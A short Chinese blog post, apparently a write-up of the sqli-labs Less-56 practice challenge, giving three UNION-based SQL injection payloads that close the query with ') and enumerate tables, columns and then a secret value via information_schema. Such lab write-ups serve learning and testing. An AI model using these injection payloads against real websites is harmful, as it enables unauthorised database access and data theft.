Less(56)

1.和Less(54)差不多, ')闭合

2.爆破

  (1)爆表:?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

    

  (2)爆列名:?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='i9347c02x8'--+

    

  (3)爆值:?id=0') union select 1,2,group_concat(secret_LDNV) from challenges.i9347c02x8--+

    

 

posted @ 2020-03-24 11:13  孟雨  阅读(95)  评论(0编辑  收藏  举报